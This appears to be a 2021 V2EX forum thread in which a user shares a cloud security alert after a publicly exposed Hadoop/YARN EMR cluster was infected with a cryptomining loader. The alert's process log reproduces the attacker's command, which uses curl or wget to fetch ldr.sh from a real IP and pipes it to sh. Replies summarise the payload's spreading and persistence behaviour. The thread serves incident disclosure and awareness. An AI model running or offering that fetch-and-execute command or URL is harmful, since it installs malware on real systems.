V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
galenzhao
V2EX  ›  分享发现

由于 有个同事手滑 把 emr 开放给公网了,结果被挂了挖矿的货,发出来大家看看

  •  
  •   galenzhao · 2021-05-17 16:28:41 +08:00 · 2581 次点击
    这是一个创建于 1293 天前的主题,其中的信息可能已经有所发展或是发生改变。
    
    恶意脚本-恶意脚本代码执行待处理
    备注
    该告警由如下引擎检测发现:
    命令行: wget --user-agent hadoopUnauth -q -O - http://194.145.227.21/ldr.sh
    进程 PID: 20234
    进程文件名: wget
    父进程 ID: 19624
    父进程文件路径: /usr/bin/bash
    进程链:
    -[3020]  /usr/lib/jvm/java-1.8.0/bin/java -Dproc_nodemanager -Xmx1536m -Dhadoop.log.dir=/var/log/hadoop-yarn -Dyarn.log.dir=/var/log/hadoop-yarn -Dhadoop.log.file=yarn-hadoop-nodemanager-emr-worker-22.cluster-42193.log -Dyarn.log.file=yarn-hadoop-nodemanager-emr-worker-22.cluster-42193.log -Dyarn.home.dir= -Dyarn.id.str=hadoop -Dhadoop.root.logger=INFO,RFA -Dyarn.root.logger=INFO,RFA -Dnodemanager.audit.logger.appender=NMAUDIT -Djava.library.path=/usr/lib/hadoop-current/lib/native::/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/lib/native:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/lib/native -Dyarn.policy.file=hadoop-policy.xml -server -javaagent:/var/lib/ecm-agent/data/jmxetric-1.0.8.jar=host=localhost,port=8649,mode=unicast,wireformat31x=true,process=YARN_NodeManager,cxss=/var/lib/ecm-agent/data/jmxetric.xml -verbose:gc -XX:+PrintGCDetails -XX:+PrintGCTimeStamps -XX:+PrintGCDateStamps -XX:+UseGCLogFileRotation -XX:NumberOfGCLogFiles=5 -XX:GCLogFileSize=128M -Xloggc:/var/log/hadoop-yarn/nodemanager-gc.log -Dhadoop.log.dir=/var/log/hadoop-yarn -Dyarn.log.dir=/var/log/hadoop-yarn -Dhadoop.log.file=yarn-hadoop-nodemanager-emr-worker-22.cluster-42193.log -Dyarn.log.file=yarn-hadoop-nodemanager-emr-worker-22.cluster-42193.log -Dyarn.home.dir=/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1 -Dhadoop.home.dir=/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1 -Dhadoop.root.logger=INFO,RFA -Dyarn.root.logger=INFO,RFA -Djava.library.path=/usr/lib/hadoop-current/lib/native::/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/lib/native:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/lib/native -classpath /etc/ecm/hadoop-conf:/etc/ecm/hadoop-conf:/etc/ecm/hadoop-conf:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/common/lib/*:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/common/*:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/hdfs:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/hdfs/lib/*:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/hdfs/*:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/yarn/lib/*:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/yarn/*:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/mapreduce/lib/*:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/mapreduce/*:/usr/lib/hadoop-current/lib/*:/usr/lib/tez-current/*:/usr/lib/tez-current/lib/*:/etc/ecm/tez-conf:/opt/apps/extra-jars/*:/usr/lib/spark-current/yarn/spark-2.4.5-yarn-shuffle.jar:/usr/lib/hadoop-current/contrib/capacity-scheduler/*.jar:/usr/lib/hadoop-current/contrib/capacity-scheduler/*.jar:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/yarn/*:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/yarn/lib/*:/etc/ecm/hadoop-conf/nm-config/log4j.properties org.apache.hadoop.yarn.server.nodemanager.NodeManager
        -[19619]  bash /mnt/disk2/yarn/usercache/dr.who/appcache/application_1612510029551_7345/container_1612510029551_7345_02_000001/default_container_executor.sh
            -[19622]  /bin/bash -c (curl --user-agent hadoopUnauth http://194.145.227.21/ldr.sh||wget --user-agent hadoopUnauth -q -O - http://194.145.227.21/ldr.sh)|sh
                -[19624]  /bin/bash -c (curl --user-agent hadoopUnauth http://194.145.227.21/ldr.sh||wget --user-agent hadoopUnauth -q -O - http://194.145.227.21/ldr.sh)|sh
    
    事件说明: 云安全中心检测到您的主机正在执行恶意的脚本代码(包括但不限于 bash 、powershell 、python),请立刻排查入侵来源。如果是您的运维行为,请选择忽略。
    
    

    http://194.145.227.21/ldr.sh

    3 条回复    2021-05-18 10:16:06 +08:00
    march1993
        1
    march1993  
       2021-05-17 16:57:44 +08:00
    1 ) 还有一个 BrowserUpdate.exe 。。替换所有的 .html .php .jsp 。。 真牛逼。。咋不在 html 里注入 js 来得实在呢。。
    2 )还把 8.8.8.8 写入 dns 配置了,这是被 dns 坑惨过?
    3 )没有 crontab 还给你装一个??还 apt yum 都支持的那种???
    4 )顺着 bash_history 把登录过的主机全给感染? 666
    5 )服务器本身倒是没有被挖矿。。。
    galenzhao
        2
    galenzhao  
    OP
       2021-05-17 23:48:16 +08:00 via iPhone   ❤️ 1
    @march1993 挖矿是另一个 py 的脚本 他自己删除自己了🙄
    missz
        3
    missz  
       2021-05-18 10:16:06 +08:00
    应该是云盾之类的安全软件删的
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2614 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 26ms · UTC 10:41 · PVG 18:41 · LAX 02:41 · JFK 05:41
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.